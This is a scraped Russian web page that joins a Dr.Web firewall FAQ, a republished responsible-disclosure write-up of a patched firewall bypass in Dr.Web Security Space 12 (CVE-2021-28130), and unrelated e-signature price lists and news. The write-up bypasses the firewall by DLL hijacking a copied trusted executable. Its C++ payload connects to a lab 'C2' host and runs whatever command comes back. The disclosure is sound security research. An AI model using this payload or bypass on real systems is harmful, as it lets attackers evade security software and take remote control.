Что такое брандмауэр доктор веб
Перейти к содержимому

Что такое брандмауэр доктор веб

Что такое брандмауэр доктор веб

Брандмауэр Dr.Web предназначен для защиты вашего компьютера от несанкционированного доступа извне и предотвращения утечки важных данных по сети. Этот компонент позволяет вам контролировать подключение и передачу данных по сети и блокировать подозрительные соединения на уровне пакетов и приложений.

Брандмауэр предоставляет вам следующие преимущества:

• контроль и фильтрация всего входящего и исходящего трафика;

• контроль подключения на уровне приложений;

• фильтрация пакетов на сетевом уровне;

• быстрое переключение между наборами правил;

Чтобы включить или отключить Брандмауэр

1. Откройте меню Dr.Web и выберите пункт Центр безопасности .

2. В открывшемся окне нажмите плитку Файлы и сеть .

3. Включите или отключите Брандмауэр при помощи переключателя .

Рисунок 50. Включение/отключение Брандмауэра

Часто задаваемые вопросы по темам

Брандмауэр (англ. Firewall — противопожарная стена, он же сетевой экран, он же файервол) — это программа, контролирующая обмен данными между вашим компьютером и остальной сетью. Основная задача брандмауэра — мониторинг сетевой активности, генерируемой приложениями, и предотвращение попыток хакеров или вредоносных программ отправить какую-либо информацию с вашего компьютера в сеть или, наоборот, несанкционированно принять ее из удаленного источника.

Что такое интерактивный режим брандмауэра?

В этом режиме вам предоставляется возможность обучить брандмауэр реакции на попытки той или иной программы проявить сетевую активность.

При обнаружении обращения к сетевым ресурсам Брандмауэр Dr.Web проверяет, заданы ли для этих программ правила фильтрации. Если правила отсутствуют, то выводится соответствующий запрос, в котором пользователь может выбрать разовое действие для брандмауэра или создать правило, по которому в дальнейшем подобная сетевая активность приложения будет обрабатываться.

Брандмауэр заблокировал доступ в интернет. Что делать?

При блокировке Брандмауэром работы с сетью необходимо сделать следующее.

  1. Для сброса настроек щелкните во значку Dr.Web в трее, откройте в меню антивируса пункт Центр безопасности, нажмите на значок drweb lockв левом нижнем углу окна, а затем — drweb gearв правом верхнем. В открывшемся окне в разделе Управление настройками выберите Изменить → Восстановить настройки по умолчанию и нажмите ОК. Внимание! При выполнении этого действия сбросятся пользовательские параметры всех компонентов Dr.Web, их потребуется настроить заново. После этого при попытке выйти в интернет могут появляться запросы от Брандмауэра (создать правило, запретить однократно, разрешить однократно). Создайте разрешающие правила для нужных вам приложений, нажав на кнопку Создать правило → Разрешить → OK. Подробнее об обучении Брандмауэра читайте в документации
  2. Обратитесь в службу технической поддержки, приложив отчет, созданный утилитой DwSysInfo. Для создания отчета:
    1. Загрузите и сохраните на компьютере утилиту: https://download.geo.drweb.com/pub/drweb/tools/dwsysinfo.exe
    2. Запустите сохраненный файл dwsysinfo.exe.
    3. Нажмите на кнопку Сформировать отчет.
    4. Дождитесь окончания формирования отчета.

Как запретить программе выход в интернет?

drweb lock

Чтобы запретить использование сети определенной программе, необходимо создать новое правило. Щелкните по значку Dr.Web на панели задач, выберите Центр безопасности → Файлы и сеть и нажмите на значок .

При появлении окна контроля учетных записей пользователей нажмите на кнопку Да и при необходимости введите пароль администратора.

Выберите ставший активным раздел Брандмауэр и нажмите Изменить в пункте Правила для приложений.

drweb plus

В открывшемся окне нажмите на значок , чтобы добавить новое правило.

В следующем окне укажите путь к исполняемому файлу приложения, в выпадающем списке Запуск сетевых приложений выберите Блокировать, а в списке Доступ к сетевым ресурсам — Блокировать все.

Нажмите ОК, чтобы изменения вступили в силу.

Появилось окно уведомления брандмауэра. Что с ним делать?

Появление окна уведомления указывает на то, что для приложения, на которое среагировал брандмауэр, не задано правило обработки. Вы можете поступить одним из следующих способов.

  • Разрешить однократно — сетевая активность приложения будет разрешена на время текущего сеанса. После перезагрузки компьютера или при повторном вызове программы запрос брандмауэра будет выдан вновь.
  • Запретить однократно — запрет сетевой активности программы. Только на текущий сеанс.
  • Создать правило — когда вы настроите правило для приложения, брандмауэр будет автоматически срабатывать согласно этому правилу. Выбрав этот пункт, вы увидите окно, в котором вам будет предложен выбор действия:
    • Разрешить приложению сетевые подключения на порт *номер порта*
    • Запретить приложению сетевые подключения на порт *номер порта*
    • Разрешить приложению все сетевые подключения
    • Запретить приложению все сетевые подключения
    • Создать свое правило — вы можете создать новое правило для работы брандмауэра с текущей программой.

    Примечание. Всегда старайтесь создавать правила, чтобы автоматизировать работу брандмауэра.

    Как создать правило для приложения (программы)?

    drweb lock

    Чтобы запретить использование сети определенной программе, необходимо создать новое правило. Щелкните по значку Dr.Web на панели задач, выберите Центр безопасности → Файлы и сеть и нажмите на значок .

    При появлении окна контроля учетных записей пользователей нажмите на кнопку Да и при необходимости введите пароль администратора.

    Выберите ставший активным раздел Брандмауэр и нажмите Изменить в пункте Правила для приложений.

    drweb plus

    В открывшемся окне нажмите на значок , чтобы добавить новое правило.

    В следующем окне укажите путь к исполняемому файлу приложения, в выпадающем списке Запуск сетевых приложений выберите нужное действие:

    • Разрешать — при попытке запуска сетевого приложения брандмауэр будет разрешать это действие.
    • Блокировать — при попытке запуска сетевого приложения брандмауэр будет запрещать это действие.
    • Не задано — при попытке запуска сетевого приложения брандмауэр будет выдавать запрос.

    Затем выберите нужное действие в списке Доступ к сетевым ресурсам:

    • Разрешать все — будет разрешена любая сетевая активность программы.
    • Блокировать все — будет запрещена любая сетевая активность программы.
    • Пользовательский — вы можете вручную настроить все параметры работы программы с сетью.
    • Не задано — при каждой попытке программы выйти в сеть будет выдаваться запрос.

    Нажмите ОК, чтобы изменения вступили в силу.

    Если брандмауэр работает в интерактивном режиме, нет необходимости настраивать правила вручную — проще настраивать доступ для каждого приложения в момент его первой сетевой активности, прямо из окна оповещения брандмауэра.

    Как отключить брандмауэр?

    drweb lock

    Щелкните по значку Dr.Web на панели задач, выберите Центр безопасности → Файлы и сеть и нажмите на значок . При появлении окна контроля учетных записей пользователей нажмите на кнопку Да и при необходимости введите пароль администратора.

    Затем сдвиньте переключатель напротив ставшего активным компонента Брандмауэр — его рамка станет красной.

    Как сбросить настройки брандмауэра?

    Для сброса настроек щелкните во значку Dr.Web в трее, откройте в меню антивируса пункт Центр безопасности, нажмите на значок drweb lockв левом нижнем углу окна, а затем — drweb gearв правом верхнем. В открывшемся окне в разделе Управление настройками выберите Изменить → Восстановить настройки по умолчанию и нажмите ОК.

    Внимание! При выполнении этого действия сбросятся пользовательские параметры всех компонентов Dr.Web, их потребуется настроить заново.

    В каких режимах может работать брандмауэр?

    У брандмауэра есть три режима работы:

    • Разрешать неизвестные соединения — все неизвестные соединения разрешены. Защита не функционирует.
    • Разрешать соединения для доверенных приложений — правила для известных приложений (имеющих действительную цифровую подпись) применяются автоматически. Обо всех неизвестных соединениях пользователю будет выдаваться запрос на выбор действия.
    • Интерактивный режим — режим обучения. При попытке операционной системы или приложения проявить сетевую активность брандмауэр будет выдавать пользователю запрос на выбор действия.
    • Блокировать неизвестные соединения — все неизвестные соединения будут блокироваться без выдачи запроса пользователю.

    Задать режим работы можно в настройках брандмауэра. Если для приложения уже задано правило, брандмауэр будет действовать согласно ему.

    Что такое родительский процесс?

    Родительский процесс — это процесс или приложение, которое может запускать другие приложения. Настроить правила для родительских процессов можно в окне создания или редактирования правила для приложения с помощью выпадающего списка Запуск сетевых приложений.

    Как настроить правила для сетевых соединений?

    drweb lock

    Щелкните по значку Dr.Web на панели задач, выберите Центр безопасности → Файлы и сеть и нажмите на значок . При появлении окна контроля учетных записей пользователей нажмите на кнопку Да и при необходимости введите пароль администратора.

    Выберите ставший активным раздел Брандмауэр и нажмите Дополнительные настройки. В разделе Параметры работы для известных сетей нажмите Изменить. В открывшемся окне для каждого из сетевых соединений можно указать набор заранее установленных правил:

    • Allow all — все пакеты пропускаются.
    • Block all — все пакеты блокируются.
    • Default rule — правила, описывающие наиболее часто встречающиеся конфигурации сети и распространенные атаки (используются по умолчанию для всех интерфейсов).

    Как просмотреть отчет брандмауэра?

    Щелкните по значку Dr.Web на панели задач и выберите Центр безопасности → Статистика → Брандмауэр.

    Что такое пакетный фильтр?

    Это элемент брандмауэра, позволяющий управлять прохождением трафика по указанным протоколам, разрешая или запрещая передачу пакетов, удовлетворяющих заданным условиям. Пакетный фильтр — базовое средство обеспечения безопасности компьютера, работающее независимо от приложений.

    Могу ли я установить Dr.Web Firewall без установки антивируса?

    Брандмауэр Dr.Web является компонентом программного комплекса Dr.Web, и установить брандмауэр без установки антивируса невозможно.

    Что означает надпись «Цифровая подпись — Неизвестно» при попытке приложения получить доступ в интернет? Что такое цифровая подпись и на что она влияет?

    Цифровая подпись — код, который удостоверяет, что программа была получена из конкретного источника и не изменялась. В то же время подписанное приложение не обязательно безопасно, поэтому пользователю стоит быть внимательным при установке любого, даже подписанного программного обеспечения.

    Неизвестное приложение постоянно пытается выйти в интернет. Что это может быть и что делать в этом случае?

    Возможно, что это какая-либо вредоносная программа. Рекомендуется провести полную проверку системы антивирусным сканером Dr.Web.

    Нужно ли настраивать пакетный фильтр для домашнего компьютера?

    В домашних условиях, когда требуется защищать от сетевых атак только один компьютер, настройка пакетного фильтра не требуется. Дело в том, что значительная часть правил содержится в базе брандмауэра, и эти правила активируются по мере надобности. Если правило для какой-либо ситуации отсутствует, брандмауэр выдаст запрос действия.

    Обход брандмауэра (firewall) в Dr.Web Security Space 12

    Данная статья написана в рамках ответственного разглашения информации о уязвимости. Хочу выразить благодарность сотрудникам Dr.Web за оперативное реагирование и исправление обхода брандмауэра (firewall).

    В этой статье я продемонстрирую обнаруженную мной возможность обхода брандмауэра (firewall) в продукте Dr.Web Security Space 12 версии.

    При исследовании различных техник и методик обхода антивирусных программ я заметил, что Dr.Web Security Space 12 версии блокирует любой доступ в Интернет у самописных приложений, хотя другие антивирусные программы так не реагируют. Мне захотелось проверить, возможно ли обойти данный механизм безопасности?

    Разведка

    Во время анализа работы антивирусной программы Dr.Web, я обнаружил, что некоторые исполняемые файлы (.exe), в папке C:\Program Files\DrWeb, потенциально могут быть подвержены Dll hijacking.

    Dll Hijacking — это атака, основанная на способе поиска и загрузки динамически подключаемых библиотек приложениями Windows. Большинство приложений Windows при загрузке dll не используют полный путь, а указывают только имя файла. Из-за этого перед непосредственно загрузкой происходит поиск соответствующей библиотеки. С настройками по умолчанию поиск начинается с папки, где расположен исполняемый файл, и в случае отсутствия файла поиск продолжается в системных директориях. Такое поведение позволяет злоумышленнику разместить поддельную dll и почти гарантировать, что библиотека с нагрузкой загрузится в адресное пространство приложения и код злоумышленника будет исполнен.

    Например, возьмём один из исполняемых файлов – frwl_svc.exe версии 12.5.2.4160. С помощью Process Monitor от Sysinternals проследим поиск dll.

    Однако, у обычного пользователя нет разрешений для того чтобы подложить свой DLL файл в папку C:\Program Files\DrWeb. Но рассмотрим вариант, в котором frwl_svc.exe будет скопирован в папку под контролем пользователя, к примеру, в папку Temp, а рядом подложим свою библиотеку version.dll. Такое действие не даст мне выполнение программы с какими-то новыми привилегиями, но так мой код из библиотеки будет исполнен в контексте доверенного приложения.

    Подготовительные мероприятия

    Я начну свой эксперимент с настройки двух виртуальных машин с Windows 10. Первая виртуальная машина служит для демонстрации пользователя с установленным антивирусом Dr.Web. Вторая виртуальная машина будет «ответной стороной», на ней установлен netcat для сетевого взаимодействия с первой виртуалкой. Начальные настройки при установке:

    • На первую виртуальную машину с IP 192.168.9.2 установлю Dr.Web последней версии, в процессе установки Dr.Web’а выберу следующие пункты:
    • На вторую виртуальную машину с ip 192.168.9.3 установлю netcat.

    Для демонстрации я разработал два исполняемых файла:

    • Приложение test_application.exe предназначено для демонстрации исправной работы брандмауэра (firewall). Простая утилита на С++, которая отправляет по сети сообщение “test”. Ещё она может принимать сетевые ответы и затем исполнять их. В случае нормальной работы брандмауэра (firewall) моё приложение test_application.exe не сможет отправить сообщение “test”.
    • Второй файл — это прокси-библиотека version.dll, которая размещается рядом с frwl_svc.exe на первой виртуальной машине. Функциональность та же, что и test_application.exe, только код собран как dll.
    void Payload() < char C2Server[] = "192.168.9.3"; int C2Port = 4444; SOCKET mySocket; sockaddr_in addr; WSADATA version; WSAStartup(MAKEWORD(2, 2), &version); mySocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(C2Server); addr.sin_port = htons(C2Port); if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) < closesocket(mySocket); WSACleanup(); >else < printf("Connection made sucessfully\n"); char* pBuf = "test\n"; printf("Sending request from client\n"); send(mySocket, pBuf, strlen(pBuf), 0); char szResponse[50]; recv(mySocket, szResponse, 50, 0); system(szResponse); closesocket(mySocket); WSACleanup(); >>

    Видео эксплуатации

    После подготовительных мероприятий, я, наконец, подошёл к эксплуатации. На этом видео представлена демонстрация возможности обхода брандмауэра (firewall) в продукте Dr.Web Security Space 12 версии. (Dr.Web, version.dll и test_application.exe находится на первой виртуальной машине, которая расположена с левой стороны видео. А netcat находится на второй виртуальной машине, которая расположена с правой стороны видео.)

    Вот что происходит на видео:

    • На второй виртуальной машине запускаем netcat он же nc64.exe и прослушиваем порт 4444.
    • Затем на первой виртуальной машине в папке C:\Users\root\AppData\Local\Temp распакуем aplications.7z, там находятся version.dll и test_application.exe.
    • После этого, с помощью whoami показываем, что все действия от обычного пользователя.
    • Потом копируем C:\Program Files\DrWeb\frwl_svc.exe в папку C:\Users\root\AppData\Local\Temp\aplications.
    • Дальше демонстрируем, что брандмауэр (firewall) включён, исключения отсутствуют и время последнего обновления антивируса.
    • Следующим шагом запускаем тестовое приложение test_application.exe и проверяем работоспособность брандмауэр (firewall). Dr.Web заблокировал тестовое приложение, а значит можно сделать вывод, что брандмауэр (firewall) работает корректно.
    • Запускаем frwl_svc.exe и видим подключение в nc64.exe на второй машине.
    • Передаём команду на создание папки test на первой машине с помощью nc64.exe, который находится на второй машине.

    Вывод

    Убедившись, что способ работает, можно сделать предположение, что, антивирус доверяет «своим» приложениям, и сетевые запросы, сделанные от имени таких исполняемых файлов, в фильтрацию не попадают. Копирование доверенного файла в подконтрольную пользователю папку с готовой библиотекой — не единственный способ исполнить код в контексте приложения, но один из самых легковоспроизводимых. На этом этапе я собрал все артефакты исследования и передал их специалистам Dr.Web. Вскоре я получил ответ, что уязвимость исправлена в новой версии.

    Проверка исправлений

    После сообщения о новой версии с иcправлением я решил посмотреть, как был исправлен обход. Начал с тех же действий, что и при разведке: что запустил frwl_svc.exe и посмотрел журнал Process Monitor, чтобы узнать какие Dll пытаются загрузиться.

    Вижу, что frwl_svc.exe версии 12.5.3.12180 больше не загружает стандартные dll. Это исправляет сам подход с dll hijacking, но появилась гипотеза, что логика работы с доверенными приложениями осталась. Для проверки я воспользовался старой версией frwl_svc.exe.

    Подготовительные мероприятия

    Начну проверку своей гипотезы с того, что настрою две виртуальные машины с windows 10 по аналогии с тем, как всё было в демонстрации.

    • На первую виртуальную машину с ip 192.168.9.2 я установлю Dr.Web последней версии. Процесс установки Dr.Web не отличатся от того, который был описан в предыдущем отчёте. А также в папку Temp я скопирую frwl_svc.exe версии 12.5.2.4160 и version.dll из предыдущего отчета.
    • На вторую виртуальную машину c ip 192.168.9.3 я установлю netcat.

    Видео эксплуатации

    После настройки двух виртуальных машин пришло время эксплуатации. На этом видео показана возможность обхода патча, которым Dr.Web исправил ошибку из предыдущего отчёта. Расположение виртуальных машин не отличается от представленных в предыдущем видео. Напомню, первая машина находится с левой стороны на видео, а вторая машина – с правой стороны. Действия в видео:

    • На второй виртуальной машине запускаем netcat(nc64.exe) и прослушиваем порт 4444.
    • Затем на первой виртуальной машине с помощью whoami показываем, что все действия от обычного пользователя.
    • Потом показываем версию frwl_svc.exe (12.5.2.4160) в папке C:\Users\drweb_test\AppData\Local\Temp.
    • Дальше демонстрируем версию frwl_svc.exe (12.5.3.12180) в папке C:\Program Files\DrWeb.
    • Следующим шагом показываем, что брандмауэр (firewall) включён, исключения отсутствуют и время последнего обновления.
    • После этого запускаем C:\Users\drweb_test\AppData\Local\Temp \frwl_svc.exe и видим подключение в nc64.exe во второй машине.
    • Последним шагом передаём команду на создание папки test на первой машине с помощью nc64.exe, который находится на второй машине.

    Вывод

    В результате проверки исправлений я обнаружил, что патч исправляет не саму проблему с доверенными приложениям, а только мой способ реализации данной уязвимости. Старая версия frwl_svc.exe отлично обходила ограничения. Все собранные сведения были переданы команде Dr Web. Вскоре была выпущена новая версия исправления, которая уже не обходилась моим методом.

    Timeline

    • 16.02.2021: Передача отчета в Dr.Web.
    • 25.02.2021: Dr.Web сообщает, что данная возможность обхода firewall исправлена.
    • 10.03.2021: Запрос cve.
    • 11.03.2021: Получение CVE 2021-28130.
    • 14.03.2021: Проверка исправлений.
    • 15.03.2021: Передача отчета в Dr.Web.
    • 06.04.2021: Dr.Web сообщает, что данная возможность обхода firewall исправлена.
    • 23.09.2021: Публикация статьи.
    • Блог компании Перспективный мониторинг
    • Информационная безопасность
    • Антивирусная защита

    Новости

    Законов и документов регуляторов, регламентирующих правила защиты компаний и организаций самого разного профиля— государственных и частных, защищающих персональные данные (ПДн) и обеспечивающих функционирование критически важных систем — в России достаточно.

    Кратко опишем их требования – и начнем с требований в области закона 152-ФЗ «О персональных данных».

    Квалифицированная электронная подпись, выпущенная нашим УЦ применяется на большинстве популярных электронных торговых площадках, государственных порталах и иных информационных системах. Электронная подпись изготавливается для всех типов заявителей: ИП, юридических и физических лиц.

    Стоимость создания сертификата электронной подписи
    Цены, руб.

    Базовый квалифицированный сертификат + ViPNet CSP бесплатно 1900

    — Электронная торговая площадка «Элтокс» (https://eltox.ru/)
    — Электронная торговая площадка МФБ (http://etp.mse.ru/)
    — Электронная площадка ВТБ Центр (http://www.vtb-center.ru/)
    — Автоматизированная система электронных закупок (АСЭЗ) Газпрома (https://zakupki.gazprom.ru/)
    — Региональная торговая площадка «Regtorg.com» (http://www.regtorg.com/)
    — Портал Московского городского суда по защите интеллектуальных прав (https://lk.mos-gorsud.ru/)
    — Портал государственных услуг (госуслуг) (http://www.gosuslugi.ru/)
    — Официальный сайт Единой информационной системы в сфере закупок (http://zakupki.gov.ru/)
    — Портал Росалкогольрегулирования (https://service.fsrar.ru/)
    — Портал ФСС (http://f4.fss.ru/)
    — Портал Территориальнго органа Федеральной службы государственной статистики по Республике Башкортостан (https://sbor.bashstat.ru/online/)
    — Портал ФГУП «Главный радиочастотный центр» (http://www.grfc.ru/)
    — Роскомнадзор. Единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено (http://eais.rkn.gov.ru/)
    — Роскомнадзор. Реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространяемую с нарушением исключительных прав (http://nap.rkn.gov.ru/tooperators/)
    — Росимущество. Межведомственный портал по управлени. Государственной собственностью. (https://mvpt.rosim.ru/)
    — Роспатент (ФГБУ ФИПС) (http://www1.fips.ru/)
    — Государственная информационная система в области энергосбережения и повышения энергетической эффективности (http://gisee.ru/)
    — Росфинмониторинг (http://fedsfm.ru/)
    — Служба Банка России по финансовым рынкам (http://cbr.ru/sbrfr/)
    — ФГИС Росаккредитации (http://fsa.gov.ru/)
    — Группа электронных площадок ОТС.RU (http://www.otc.ru/)
    — Торговая система «Газнефтеторг.ру» (http://www.gazneftetorg.ru/)
    — ФГИС территориального планирования (http://fgis.economy.gov.ru)
    — Роснефть Закупки (http://zakupki.rosneft.ru/)
    — Электронные системы Поволжья (http://www.el-torg.com/)
    — Электронная торговая площадка УГМК (http://zakupki.ugmk.com/)
    — Портал Росприроднадзора (https://pnv-rpn.ru)
    — Вестник государственной регистрации (http://www.vestnik-gosreg.ru/)
    — Биржа «Санкт-Петербург» (http://www.spbex.ru/)
    — Электронная торговая площадка «ТоргиКоми» (http://torgikomi.ru/)
    — Торговая Система «ОБОРОНТОРГ» (http://www.oborontorg.ru/)
    — Центр дистанционных торгов (только для организаторов и арбитражных управляющих) (http://cdtrf.ru/)
    — Электронная площадка Администрации города Красноярск (http://torgi.admkrsk.ru)
    — Государственная информационная система жилищно-коммунального хозяйства (ГИС ЖКХ) (http://dom.gosuslugi.ru/)
    — Единая строительная тендерная площадка (http://estp-sro.ru/)
    — Система электронных торгов по продаже арестованного и конфискованного имущества (http://etp-rim.ru/)
    — Портал Коммерсант Картотека (http://www.kartoteka.ru/)
    — Электронная торговая площадка ОАО «Россети» (https://etp.rosseti.ru)
    — Торговая Система «Спецстройторг» (http://www.sstorg.ru/)
    — Портал государственных программ Российской Федерации (http://programs.gov.ru/)
    — Портал городских услуг г. Москва (https://pgu.mos.ru)
    — Центр развития электронных торгов (http://torgi223.ru/)
    — Портал Федеральной нотариальной палаты для подачи сведений от органов местного самоуправления (https://app.fciit.ru/oms)
    — Официальный сайт РФ для размещения информации о проведении торгов (http://torgi.gov.ru)
    — ГИС Маркировки меховых изделий (http://markirovka.nalog.ru/)
    — ЕГАИС «Учет древесины и сделок с ней» (http://lesegais.ru/)
    — ЭТП ГУП «Москоллектор» (http://etp.moscollector.ru/)
    Системы электронного документооборота:
    — Любые системы электронного документооборота, например ViPNet ЭДО Документ

    Электронные торговые площадки + к стоимости базового сертификата
    — Федеральные ЭТП — РТС-тендер, Сбербанк-АСТ, ЕЭТП, ММВБ, zakazrf.ru +2600
    — Ассоциация ЭТП (включая группу площадок В2В, uTender) +2900
    — Федеральные ЭТП + Ассоциация ЭТП (включая группу площадок В2В, uTender, ЭТП ETPRF) +3500
    — uTender +1700
    — Группа площадок B2B +1700
    — Сибирская торговая площадка +100
    — Портал закупок «Рефери»+«Рефери закупки 223-ФЗ» +1700
    — Электронная торговая площадка ГПБ (etp.gpb.ru) +3500
    — Электронная торговая площадка «Центр реализации» (centerr.ru) +1700
    — Электронная торговая площадка «Арбитат» (arbitat.ru) +1700
    — Электронная торговая площадка «ТЭК-торг» (rn.tektorg.ru) +1700

    Государственные информационные системы + к стоимости базового сертификата

    — Единый федеральный реестр сведений о фактах деятельности юридических лиц (ЕФРСФДЮЛ); Единый федеральный ресурс сведений о банкротстве (ЕФРСБ) +100
    — Портал Росреестра +600
    — ФГИС «ЕИАС ФСТ России» (eias.ru) +1600
    — Федеральная таможенная служба (customs.ru) +2000
    — Сдача отчетности через портал nalog.ru (service.nalog.ru/nbo/) +600
    — Башфин +50
    — РИКС +50
    — Башфин + РИКС +1400

    Сертификат для ЕГАИС

    — Единая государственная автоматизированная информационная система учета объема производства и оборота этилового спирта, алкогольной и спиртосодержащей продукции (egais.ru) 2500
    — USB-ключ JaCarta SE ГОСТ 1950

    — USB-ключ JaCarta LT. Сертификат ФСТЭК 900
    — USB-ключ eToken PRO (Java), защищённая память 72КБ, сертификат ФСТЭК 1500
    — Настройка рабочего места с использованием удаленного подключения к компьютеру заказчика 975
    — Расширенная настройка рабочего места (при заказе услуги Расширенная настройка рабочего места для порталов ФГИС Росаккредитация, ГИС ЖКХ, zakupki.gov.ru, Портал Госуслуг, Рослкогольрегулирование) — 1950
    — Консультационные услуги по аккредитации и работе на ФЭТП и Рефери 2150 *Услуга оказывается Единым центром консультаций по госзакупкам
    и может быть подключена только в момент выпуска сертификата
    — Срочный выпуск сертификата в течение 1 часа 599 * — Указанное время срочного выпуска сертификата исчисляется с момента выполнения Абонентом соответствующих условий.

    За разъяснением условий предоставления данной услуги обращайтесь по номеру 8 905 354 00 75.

    Система межведомственного электронного взаимодействия (СМЭВ) (данные сертификаты являются специализированными и на завязаня на базовый сертификат)

    — Сертификат для использования должностным лицом 1500
    — Сертификат для использования органом исполнительной власти или кредитной 1500

    Теперь Вы имеете возможность самостоятельно заполнить заявку, получить счет (круглосуточно, в любой день недели) и выбрать место получения сертификата квалифицированной электронной подписи ( для госпорталов, торговых площадок, электронного документооборота), зарегистрировавшись в личном кабинете.

    Для юридических и физических лиц из г. Кумертау, г. Мелеуз, с Мраково, с. Исянгулово, с. Зилаир и ближайших районов личный кабинет доступен по ссылке (для тех, кто хочет получить сертификат квалифицированной (усиленной) электронной подписи в офисе в г. Кумертау).

    Для юридических и физических лиц из любых других населенных пунктов Республики Башкотостан, Поволжья и всех других регионов Российской Федерации личный кабинет доступен по ссылке (для тех, кто хочет получить сертификат квалифицированной (усиленной) электронной подписи в офисе ОАО «ИнфоТеКС Интернет Траст», либо в офисе ближайшего к Вам представителя ОАО «ИнфоТеКС Интернет Траст»).

    После перехода по необходимой Вам ссылке, выберите тип заказчика (ЮЛ, ФЛ, ИП), введите контактные данные, нажмите «Зарегистрироваться». На указанный адрес электронной почты, через пару минут, придет письмо, в нем будет ссылка для подтверждения регистрации (перейдите по ней для подтверждения), так же будет логин и пароль для входа в личный кабинет, запишите эти данные. Зайдите в личный кабинет (ссылки указаны выше, выбирайте более удобный для Вас вариант), нажмите кнопку «Подать заявку», выберите необходимый сертификат и следуйте указаниям).

    Подготовьте необходимый комплект документов и явитесь в ближайший офис для идентификации, получения сертификата ключа подписи и оригиналов документов.

    Все вопросы принимаем по номеру 8 905 354 0075, и на электронную почту.

    Адрес офиса в городе Кумертау : ул. К. Маркса, д. 6, помещение 4, офис 2.

    Официальная группа в Вконтакте https://vk.com/cyberprotec , подпишитесь, и вы будете в курсе новостей IT-индустрии.

    КИБЕРЗАЩИТА и ОАО «ИнфоТеКС Интернет Траст» предоставляет услуги по сдаче электронной бухгалтерской отчетности через интернет в налоговую (ФНС), пенсионный фонд (ПФР), фонд социального страхования (ФСС), Росстат. Услуга предоставляется на базе современного программного обеспечения ViPNet ЭДО Отчет и средства электронной подписи ViPNet CSP.

    Ответим на все ваши вопросы. звоните +7-905-354- 00-75.

    Этим летом «Лаборатория Касперского» исполняет желания и дарит клиентам 3 месяца лицензионной защиты. Приобретая в течение лета продукты «Лаборатории Касперского» для бизнеса, вы получаете дополнительные 3 месяца защиты бесплатно. Например, если вы приобрели продукт 1 июня 2016 года, то продлевать годовую лицензию вам будет нужно только 1 сентября 2017 года, то есть для вас годовая лицензия будет действовать целых 15 месяцев!

    Летом даже защита дольше!

    Уважаемые абоненты!

    Продолжается перевод абонентов электронной отчетности на новое поколение системы.

    Автоматический переход на ViPNet ЭДО Отчет 2.0 будет возможен с 12.05.2016 для абонентов, предоставляющих отчетность в контролирующие органы:

    • Республики Башкортостан;
    • Республики Татарстан;
    • Свердловской области;
    • Ханты-Мансийского автономного округа;
    • Челябинской области.

    Работа системы ViPNet ЭДО Отчет текущих версий (1.0) будет поддерживаться в штатном режиме до полного перехода всех абонентов на версию 2.0.

    При получении в системе уведомления о доступном обновлении убедительно просим вас удостовериться, что документооборот в текущей версии системы завершен по всем значимым отчетам и документам.

    Обновление для абонентов, предоставляющих отчетность в указанные контролирующие органы, будет предоставляться поступательно в виде обновления программы с переходом на новую версию.

    Изменения, внесенные в Лесной кодекс РФ на основании № 415-ФЗ, вступили в законную силу с 1 июля 2015 года, но вопросы по работе в Единой государственной автоматизированной информационной системе (ЕГАИС) волнуют пользователей портала до сих пор. Конкретизируем основные положения, требующие обязательного исполнения.

    Тестовый период продлился с 1.07.2015 по 31.12.2015. В течение 6 месяцев нарушения или несоблюдение нормативных актов, касающихся работы в Единой государственной системе, не попадали под штрафные санкции. С 1 января 2016 года стороны, участвующие в заготовке или сделках с древесиной, несут административную ответственность за непредоставление или несвоевременное предоставление сведений в ЕГАИС.

    «Лаборатория Касперского» выпустила новое приложение Kaspersky Security для Windows Server. В продукт включена технология защиты общих папок от программ-шифровальщиков, которая блокирует зараженному компьютеру доступ к сетевым ресурсам. Таким образом дополнительно повышается безопасность корпоративных систем хранения и серверов.

    Заказы и вопросы принимаются по номеру 8 905 354 00 75.

    С 1 марта 2016 года предприниматели, занятые в сфере производства и реализации изделий из натурального меха, обязаны зарегистрироваться в Государственной информационной системе «Маркировка». Сведения подаются в электронном виде и удостоверяются электронной подписью.

    Главной задачей единой системы — противодействие незаконному обороту товара из натурального меха. Законопроект разрабатывался для государств Евразийского Экономического союза и вступил в силу в России, Беларуси, Казахстане, Армении, Киргизии. Пробный период в РФ начат 1 апреля 2016 года и продлится 6 месяцев. За этот срок будет протестирована эффективность работы ГИС, отрегулированы механизмы взаимодействия и устранены возможные сбои и неполадки.

    Так как штрафы в течение пробного периода не предусмотрены, участие в новом проекте считается добровольным. Маркировке подлежат изделия из натурального меха, к ним относится 4303 позиции. Контрольные идентификационные знаки (КИЗ) наносятся на изделия, произведенные на территории России и ввозимые из-за рубежа. КИЗ является бланком строгой отчетности и содержит радиочастотный чип, снабженный передатчиком. Каждая метка содержит типографические защитные символы для защиты от дублирования и подделки.

    До 1 января 2016 года, всем организациям, занятым в производстве, а также оптово-розничном сбыте алкогольной продукции (включая слабоалкогольные напитки) необходимо подключиться к ЕГАИС.

    Для соблюдения требований законодательства предприниматели обязаны оснастить кассы специальным оборудованием и программным обеспечением, подключиться к сети интернет и приобрести сертификат ключа проверки электронной подписи для ЕГАИС. Продавцы, не выполнившие требований законодательства, лишаются лицензии на продажу алкогольной продукции.

    Юридические лица и индивидуальные предприниматели из г. Кумертау, г. Мелеуз, с. Мраково, с. Исянгулово, с. Зилаир и любого другого района Республики Башкортостан могут приобрести сертификат ключа проверки электронной подписи для ЕГАИС связавшись с нами по номеру 8 905 354 00 75. Стоимость на 24 ноября 2015г. составляет 3850 рублей. установка и настройка рабочего места оплачивается отдельно, стоимость рассчитывается в зависимости от объема работ. Место выдачи носителя с подписью — г. Уфа. За небольшую дополнительную плату возможна доставка носителя сертификата ключа проверки электронной подписи для ЕГАИС в ваш офис (потребуется доверенность).

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *